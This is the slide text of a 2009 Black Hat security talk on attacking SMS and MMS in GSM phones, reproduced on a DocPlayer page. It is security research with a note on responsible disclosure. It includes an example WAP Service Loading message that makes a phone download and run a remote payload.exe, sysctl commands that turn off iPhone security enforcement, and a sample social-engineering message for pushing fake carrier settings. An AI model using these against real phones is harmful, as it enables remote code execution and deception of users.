Attacking SMS. BlackHat USA 2009. RingZero https://luis.ringzero.net

Similar documents
Security Guide. BlackBerry Enterprise Service 12. for ios, Android, and Windows Phone. Version 12.0

BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: Security Note

Managing ios Devices. Andrew Wellington Division of Information The Australian National University XW11

Fuzzing the Phone in your Phone (Black Hat USA 2009)

Penetration Testing for iphone Applications Part 1

@msecnet / Bogdan ALECU

Injecting SMS Messages into Smart Phones for Security Analysis

Sophos Mobile Control Technical guide

Advanced Attacks Against PocketPC Phones

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

ABSTRACT' INTRODUCTION' COMMON'SECURITY'MISTAKES'' Reverse Engineering ios Applications

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

Architecture and Data Flow Overview. BlackBerry Enterprise Service Version: Quick Reference

Example of Standard API

Mobile Application Hacking for ios. 3-Day Hands-On Course. Syllabus

Absolute Backdoor Revisited. Vitaliy Kamlyuk, Kaspersky Lab Sergey Belov, Kaspersky Lab Anibal Sacco, Cubica Labs

Virtually Secure. a journey from analysis to remote root 0day on an industry leading SSL-VPN appliance

ONE Mail Direct for Mobile Devices

Pentesting iphone Applications. Satishb3

Are free Android virus scanners any good?

Mobile Application Hacking for Android and iphone. 4-Day Hands-On Course. Syllabus

Troubleshooting BlackBerry Enterprise Service 10 version Instructor Manual

Thick Client Application Security

Deploying iphone and ipad Mobile Device Management

Samsung Galaxy S II Software Upgrade

iphone in Business Mobile Device Management

Administrator's Guide

LogMeIn Rescue+Mobile for Android

Introduction to Android

1. What are the System Requirements for using the MaaS360 for Exchange ActiveSync solution?

How to configure your mobile devices post migrating to Microsoft Office 365

Potential Targets - Field Devices

IAIK. Motivation 2. Advanced Computer Networks 2015/2016. Johannes Feichtner IAIK

Peach Fuzzer Platform

SMS Fuzzing SIM Toolkit Attack

Issue 2EN. Nokia and Nokia Connecting People are registered trademarks of Nokia Corporation

Release Notes for Epilog for Windows Release Notes for Epilog for Windows v1.7/v1.8

Introducing the Adafruit Bluefruit LE Sniffer

Xperia TM. Read about how Xperia TM devices can be administered in a corporate IT environment

Sophos Mobile Control Technical Guide. Product version: 3

Kaseya 2. User Guide. Version 7.0. English

Mobile NFC 101. Presenter: Nick von Dadelszen Date: 31st August 2012 Company: Lateral Security (IT) Services Limited

VoIP Security. Title: Something Old (H.323), Something New (IAX), Something Hallow (Security), & Something Blue (VoIP Administrators)

Configuration Guide BES12. Version 12.1

Web Application Report

ipad in Business Mobile Device Management

You will need to know your staff number and MyUWSAccount password to setup your .

JBoss security: penetration, protection and patching. David Jorm

APPENDIX B1 - FUNCTIONALITY AND INTEGRATION REQUIREMENTS RESPONSE FORM FOR A COUNTY HOSTED SOLUTION

Sophos Mobile Control Installation guide

Kaspersky Lab Mobile Device Management Deployment Guide

SMS Alarm Messenger. Setup Software Guide. SMSPro_Setup. Revision [Version 2.2]

How to... Access your University Staff on your Android device

Now SMS/MMS Android Modem Quick Start Guide

Securing ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH

Microsoft Security Bulletin MS Important

eggon SDK for ios 7 Integration Instructions

ManageEngine Desktop Central. Mobile Device Management User Guide

Bell Mobile Device Management (MDM)

Sophos Mobile Control Installation guide. Product version: 3.5

Zenprise Device Manager 6.1.5

Sophos Mobile Control Technical Guide. Product version: 3.5

Intro to Firewalls. Summary

BlackBerry 10.3 Work and Personal Corporate

Automating Security Testing. Mark Fallon Senior Release Manager Oracle

BlackBerry Device Software. Protecting BlackBerry Smartphones Against Malware. Security Note

Who is Watching You? Video Conferencing Security

Ensuring the security of your mobile business intelligence

Configuration Guide BES12. Version 12.2

Configuration Guide BES12. Version 12.3

Configuration Guide. BlackBerry Enterprise Service 12. Version 12.0

Diafaan SMS Server 3.0 Manual Diafaan communication software


Bug hunting. Vulnerability finding methods in Windows 32 environments compared. FX of Phenoelit

Zend Server 4.0 Beta 2 Release Announcement What s new in Zend Server 4.0 Beta 2 Updates and Improvements Resolved Issues Installation Issues

PREVENTING ZERO-DAY ATTACKS IN MOBILE DEVICES

Norton Mobile Privacy Notice

Using the Push Notifications Extension Part 1: Certificates and Setup

Quick Start Guide Now SMS/MMS Gateway

Basic Security Considerations for and Web Browsing

NHSmail and mobile devices overview

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Reminders. Lab opens from today. Many students want to use the extra I/O pins on

Open Mobile Alliance (OMA) Device Management Overview. Peter Thompson Mark Staskauskas Qualcomm Incorporated

Owner of the content within this article is Written by Marc Grote

A70 How to Deploy Applications

Two Factor Authentication (TFA; 2FA) is a security process in which two methods of authentication are used to verify who you are.

Web Application Security

Abstract. Introduction. Section I. What is Denial of Service Attack?

You don t hear me but your phone s voice interface does. José LOPES ESTEVES & Chaouki KASMI

Mobile Iron User Guide

BYOD Guidance: BlackBerry Secure Work Space

Exchange Administrators will be able to use a more secure authentication mechanism compared with username and password

When Security Gets in the Way. PenTesting Mobile Apps That Use Certificate Pinning

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Dirty use of USSD codes in cellular networks

Sophos Mobile Control Installation guide. Product version: 3

Transcription:

Attacking SMS BlackHat USA 2009 Zane Lackey (zane@isecpartners.com) Luis Miras (luis@ringzero.net)

Agenda SMS Background Overview SMS in mobile security Testing Challenges Attack Environment Attacks Implementation Configuration Architecture Conclusion

SMS Background We re discussing SMS in the GSM world SMS is a catch-all term SMS MMS EMS Functions as a store-and-forward system Passed between carriers differently Often converted to multiple formats along the way

SMS Flow Intra-carrier

SMS Flow Inter-carrier

MMS Flow

Why is SMS important to mobile security Mobile phone messaging is unique attack surface Always on Functionality becoming more feature rich Ringtones Videos Pictures Technical hurdles for attackers are dropping Easily modified phones iphone Android Functionality at higher layers Lower layers will be attackable soon

Network Protocols Comparison

User Data Header

SMS UDH Background Allows for new functionality to be built on top of SMS MMS Ringtones Large/multipart messages Also allows for new set of attacks Is above the SMS header layer Can easily be pushed on to carrier network

SMS UDH Example Concatenated: Port addressing (WAP):

Testing Environment

Testing Setup Sending messages Access to GSM modem Encoding/Decoding messages PDUs MSISDNs WBXML Receiving messages Determining what was actually received

Sending messages AT interface GSM modems support AT commands AT+CMGS, AT+CMGW, etc Different devices and chipsets vary in supported features Terminal needed, HyperTerminal, Minicom, PySerial Can sometimes access GSM modem in phone Either via serial cable or Bluetooth Tends to be easier on feature phones Modems vary in message support GSM chip is at the heart of the modem. GSM chip documentation requires NDAs Treating chip as black box

Encoding/Decoding messages Encode/Decode SMS PDUSpy http://www.nobbi.com/pduspy.htm By hand WBXML libwbxml converts between XML and WBXML http://libwbxml.aymerick.com/ wbxml2xml.exe converts WBXML to XML xml2wbxml.exe converts XML to WBXML Python bindings available

Receiving messages Many phones drop or alter messages By the time a user sees the message through the phones UI, the phone has already potentially modified In the case of special messages (ex: concatenated), the user wont see the message until all parts arrive This hides too much data from a tester, need to see the raw message that arrives from the carrier To obtain access to raw incoming PDU, it is best to use modems or older phones with extremely limited functionality New phones store messages in phone memory Old phones will write raw PDU directly to SIM SIM can then be removed from phone and analyzed We ve modified a tool, pysimreader, to allow easy viewing of raw PDUs

Attack Environment

Attack environment goals Increase speed Requiring the carrier to deliver each message is slow Reduce Cost $0.10-$0.50 per message gets expensive when you re fuzzing thousands of messages Add ability to analyze issues Debugging, viewing logs, etc Sniffing traffic

Virtual MMS Configuration Originally used by Collin Mulliner Virtual MMSC with Kannel and Apache Apache needs a new mime type application/vnd.wap.mms-message mms Currently only Windows Mobile allows complete Virtual MMS environment over WIFI Needs new MMS server configuration WM 6.x needs registry key changes HKEY_LOCAL_MACHINE\Comm\Cellular\WAP\WAPImpl\SMSOnlyPorts

MMS Attack Vectors Message Headers MMS uses many types of messages SMS, WAP, WSP Message contents SMIL Markup language to describe content Rich content Images Audio/Video

Windows Mobile Challenges IDA Pro is the best debugger Problems connecting and attaching in both IDA Pro and ActiveSync IDA 5.5 wince debugger fixes some problems General Debugger problems ActiveSync is terrible ActiveSync connection disables the cellular data connection System binaries cannot be stepped into. XIP binaries cannot be copied off the device by default Tools available to dump files or firmware images dumprom by itsme Extract_XIP on xda-developers.com

iphone 2.x Challenges No native MMS GDB has broken features Apple maintains their own GCC and GDB ports GDB based on a 2005 release GDB server is broken Many timers within CommCenter Expired timeouts while debugging results in CommCenter restarting

iphone 3.0 beta Challenges MMS possible using modified carrier files Same GDB issues as 2.x By default breakpoints in CommCenter would crash process Adding debugging entitlements failed CommCenter workaround Attach to CommCenter Turn off all security sysctl -w security.mac.proc_enforce=0 sysctl -w security.mac.vnode_enforce=0 Set breakpoints Turn on security (sometimes needed)

Attacks

Implementation Vulnerability Android flaw in parsing UDH for concatenated messages Concatenated messages have a sequence number. Valid range is 01-FF. Setting sequence to 00 triggers an unhandled invalid array exception. Impact: Crashed com.android.phone process on Android G1 Disables all radio activity on the phone. Unable to: Make/Receive phone calls Send/Receive SMS Privately disclosed to Google in March, fixed in Android cupcake release

Additional Implementation Vulnerability SwirlyMMS Notification From field denial of service SwirlyMMS is 3 rd party iphone app to support MMS Bug in SwirlyMMS < 2.1.4 Impact: Crashes CommCenter process indefinitely Disables all radio activity on the phone. Unable to: Make/Receive phone calls Send/Receive SMS Need to remove SIM and download corrupt message to another phone Reported to SwirlySpace Thanks to Tommy and Mats!

Configuration vulnerability Who is responsible? Much different from normal software vulnerabilities OEMs, OS vendors, carriers all play a role in product Windows Mobile WAP push SL vulnerability Posted by c0rnholio on xda-developers.com http://forum.xda-developers.com/showthread.php?t=395389 Executes binary without notifying the user Not a Microsoft issue!

Configuration vulnerability Microsoft recommends strict permissions for WAPSL Do not put SECROLE_USER_UNAUTH security role in Service Loading (SL) Message Policy. In practice, many phones allow SECROLE_USER_UNAUTH WAP SL messages This means unauthenticated users executing binaries on phones. HKLM\Security\Policies\Policies (recommended values) 0x0000100c : 0x800 0x0000100d : 0xc00 Example WAP SL WXML <?xml version="1.0"?> <!DOCTYPE sl PUBLIC "-//WAPFORUM//DTD SL 1.0//EN" "http://www.wapforum.org/dtd/sl.dtd"> <sl href="http://example.com/payload.exe" action="execute-low" ></sl>

Architecture Attacks Lots of behind-the-scenes administrative messages are sent from the carrier to the phone These messages can be forged by attackers No source checking or cryptographic protections on messages If an attacker constructs a validly formatted message, phones usually interpret it accordingly Benign example: voicemail notifications

You ve got (lots of fake) mail!

Carrier Administrative Functionality OTA Settings A far more damaging example: OTA Settings OTA (Over The Air) Settings are used by carrier to push new settings to a phone Will prompt users, but easily combined with social engineering attacks This is a free message from your carrier. We re rolling out new settings to our customers to enhance their mobile experience. Please accept these new settings when they appear on your phone in the next several minutes.

OTA Settings Legitimate?

MMS Architecture Attacks

MMS Architecture Attacks

MMS Architecture Attacks

MMS Architecture Attacks

What is the content being retrieved? Binary file containing Header information SMIL markup Graphical/text content of message

MMS Headers Attackers have full control of these fields!

MMS Architecture Attacks - Impact Bypassing Source Number Spoofing Protections Interestingly, the source doesn t even have to be a number More on this in the demo Carrier Anti-virus/Malware/Spam Checking Evasion Can only be performed when content is hosted on carrier servers

Fingerprinting via MMS Notifications can also be used for fingerprinting mobile phones Most mobile phones automatically connect to the specified URL Even if they don t necessarily download the MMS file Fingerprint via User Agent: "SonyEricssonW810i/R4EA UP.Link/6.3.1.20.0 "NokiaN95-3/20.2.011; Series60/3.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.20.06.3.1.20.0 Fingerprint Via HTTP headers: x-wap-profile: "http://wap.sonyericsson.com/uaprof/w810ir301.xml"

Presenting

T.A.F.T.

T.A.F.T.?!

* Thanks to Brad Hill and Jason Snell

About T.A.F.T. Jailbroken iphone application Allows user the launch the attacks we have discussed in this presentation Supports some of the attacks we ve discussed in this presentation Implementation + Configuration flaws VM Notification and Settings MMS PoC functionality interacts with web application Automatically generates binary MMS file with appropriate headers

T.A.F.T. Architecture

T.A.F.T. Architecture

T.A.F.T. Architecture

T.A.F.T. Architecture

T.A.F.T. Architecture

T.A.F.T. Architecture

T.A.F.T Screenshots

DEMO

Do Not Try That At Home Architectural issue, so it s not a quick patch to block Will likely be exploitable for some time to come Responsibly disclosed to carrier we tested Lack of patch doesn t mean carriers are defenseless They can monitor for it and take action against subscribers Spoiler alert: We ve been told they are monitoring. They will take action. Many GSM networks are likely affected We re working with the GSM Alliance to find and notify all GSM carriers We ve removed MMS/Fingerprinting functionality from TAFT Due to agreement with carrier

Obtaining TAFT Updates: http://www.twitter.com/taftapp Email: taftapp@gmail.com Releasing via Cydia on 8/15 We ran into a serious bug that causes erratic sending times ranging from 10 seconds to 10 minutes. Testing a possible fix

Conclusions

Conclusions Many carrier-only messages can be sent by attackers MMS Spoofing, OTA Settings, Voicemail are just the start of this vulnerability class OS Vendor/Carrier/OEM interaction can cause insecurity Absolutely never enable this settings turns into remote code execution

Future Thoughts SMS easier and easier to attack Attacks we re likely to see soon: Lots more handset implementation flaws Additional Provisioning / Administrative functionality New attacks against carrier only messages

Q&A

Thank you! luis@ringzero.net zane@isecpartners.com http://luis.ringzero.net http://www.isecpartners.com

Want a copy of the presentation/tool? Email isec at blackhat@isecpartners.com Instantly receive all isec presentations and tools

References

Tools PySIM aka PySimReader Written by Todd Whiteman: http://simreader.sourceforge.net/ Originally designed as a simple tool to read and write phonebook and SMS entries from a SIM card We ve added the ability to use the tool to write arbitrary raw PDU strings to a SIM card for testing Also added verbose debugging output so you can see the raw PDUs that are stored on the SIM Our modified code available at: http://www.isecpartners.com/tools.html

Tools SIM writer ACS ACR38t USB, PC/SC compliant, supported by everything we tried it out on ~$30 @ http://www.txsystems.com/acs.html

Further Information SMS Information: http://www.3gpp.org/ftp/specs/html-info/0340.htm http://www.dreamfabric.com/sms/ http://www.developershome.com/sms/ http://www.activexperts.com/activsms/sms/ http://mobileforensics.files.wordpress.com/2007/06/understanding_sms.pdf Prior Research: http://www.mulliner.org/pocketpc/feed/collinmulliner_syscan07_pocketpcmms.pd f http://www.cs.ucdavis.edu/~hchen/paper/securecomm06.pdf http://www.blackhat.com/presentations/bh-europe-01/job-de-haas/bh-europe-01- dehaas.ppt

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information